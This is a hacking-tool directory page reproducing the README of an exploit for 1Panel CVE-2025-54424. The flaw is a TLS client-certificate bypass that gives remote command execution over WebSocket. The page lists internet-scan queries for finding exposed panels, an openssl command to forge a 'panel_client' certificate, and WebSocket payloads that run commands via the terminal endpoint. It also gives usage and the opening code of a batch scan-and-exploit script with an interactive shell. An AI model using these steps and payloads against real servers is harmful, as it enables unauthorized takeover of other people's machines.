Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
1Panel-CVE-2025-54424- — Exploit tool for 1Panel CVE-2025-54424, enabling certificate bypass and remote command execution via WebSocket, with batch scanning and interactive shell. | Kitploit
Tools/GitHubGitHub/anonnymous5/1panel-cve-2025-54424-
Vulnerability ScannersExploitationWeb Application ExploitationPenetration TestingCommand and ControlRemote Access Tool
GitHubanonnymous5/1panel-cve-2025-54424-

1Panel-CVE-2025-54424-

Exploit tool for 1Panel CVE-2025-54424, enabling certificate bypass and remote command execution via WebSocket, with batch scanning and interactive shell.

View Repository
139 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2025-54424

CVE-2025-54424:1Panel Client Certificate Bypass RCE Vulnerability All-in-One Tool (Scan + Exploit)

Vulnerability Overview

1Panel is an open-source, modern Linux operation and maintenance panel that provides a graphical interface for deploying websites, managing servers, and running services.

In affected versions, the Agent-side TLS authentication policy is set to tls.RequireAnyClientCert, which only requires a certificate but does not verify its trustworthiness. An attacker can bypass TLS verification with a self-signed certificate, forge the CN field to panel_client, and bypass application-layer validation. Ultimately, the attacker can forge a certificate to make unauthorized command execution interface calls, leading to a remote command execution vulnerability.

Affected Versions

<= v2.0.5

Reconnaissance Syntax

The hunter and fofa reconnaissance queries are as follows

cert.subject_org=="FIT2CLOUD"&&ip.port="9999” || cert.subject.suffix=="panel_server"

cert.subject.org="FIT2CLOUD" && port="9999" && protocol="tls" || cert.subject.cn="panel_server"

Vulnerability Analysis

Copy from GitHub vulnerability advisory section

  • First, introduce the concepts of 1Panel v2 Core and Agent. After the new version release, 1Panel added node management functionality, allowing control of other hosts by adding nodes.
  • The HTTPS protocol used for communication between Core and Agent does not fully verify the authenticity of certificates during certificate validation, leading to unauthorized interface access. Due to the presence of numerous command execution or high-privilege interfaces in 1Panel, this leads to RCE.

Code Audit Process

  1. First, we enter the Agent HTTP route file agent/init/router/router.go

  1. It is found that the Routers function references the Certificate function for global validation in agent/middleware/certificate.go

  2. It is found that the Certificate function checks whether c.Request.TLS.HandshakeComplete indicates certificate communication.

  3. Since the truth value of c.Request.TLS.HandshakeComplete is determined by tls.RequireAnyClientCert in the Start function of agent/server/server.go Note: Here, because tls.RequireAnyClientCert is used instead of tls.RequireAndVerifyClientCert, RequireAnyClientCert only requires the client to provide a certificate but does not verify the issuing CA. Therefore, any self-signed certificate can pass the TLS handshake.

  4. Subsequent checks in the Certificate function only verify that the certificate CN field is panel_client, without verifying the certificate issuer. Finally, it was found that WebSocket connections can bypass Proxy-ID verification.

  5. There are numerous WebSocket interfaces in the project.

  • Process WebSocket interface (through the above issue, sensitive information such as all processes can be obtained) Route: /process/ws Request format:
{
  "type": "ps",           // Data type: ps(process), ssh(SSH session), net(network connection), wget(download progress)
  "pid": 123,             // Optional, filter by process ID
  "name": "process_name", // Optional, filter by process name
  "username": "user"      // Optional, filter by username
}

  • Terminal SSH WebSocket interface (through the above issue, arbitrary commands can be executed) Route: /hosts/terminal Request format:
{
  "type": "cmd",
  "data": "d2hvYW1pCg=="  // Base64 encoding of "whoami", remember not to omit the newline.
}

  • Container Terminal WebSocket interface (for executing commands in containers) Route: /containers/terminal
  • File Download Process WebSocket interface (automatically pushes download progress information) Route: /files/wget/process

Vulnerability Reproduction

Manual Reproduction

  1. Generate certificate: openssl req -x509 -newkey rsa:2048 -keyout panel_client.key -out panel_client.crt -days 365 -nodes -subj "/CN=panel_client"

  2. After loading the generated panel_client.crt and panel_client.key in Burp, open a WebSocket request, set the target, and start the request.

Batch Detection

Use the tool I developed, CVE-2025-54424.py, for batch detection and exploitation. Usage instructions are as follows:

Install required dependencies: pip install websocket-client cryptography PySocks requests

usage: CVE-2025-54424.py [-h] (-u URL | -f FILE) [-o OUTPUT] [-t THREADS]
                         [--proxy PROXY]

1Panel 客户端证书绕过RCE漏洞 一体化工具 (扫描+利用)
作者: Mrxn https://github.com/Mr-xn

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     单个目标,进入利用模式。例如: 192.168.1.100:8080
  -f FILE, --file FILE  目标文件,进入批量扫描模式。
  -o OUTPUT, --output OUTPUT
                        [扫描模式] 保存漏洞结果的文件名。
  -t THREADS, --threads THREADS
                        [扫描模式] 并发线程数。
  --proxy PROXY         为所有请求设置代理。例如: http://127.0.0.1:8080

For example, single target detection + command execution (interactive SSH command execution) is shown below:

import base64
import ssl
import sys
import json
import os
import tempfile
import argparse
import requests
import websocket
import threading
from concurrent.futures import ThreadPoolExecutor, as_completed
from urllib.parse import urlparse
from cryptography import x509
from cryptography.x509.oid import NameOID
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives import serialization
import datetime

# 禁用 requests 库在禁用SSL验证时产生的警告
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

# --- 全局变量和线程锁 ---
print_lock = threading.Lock()
exploit_running = True
vulnerable_hosts = []

# --- 核心功能函数 ---
Download Tool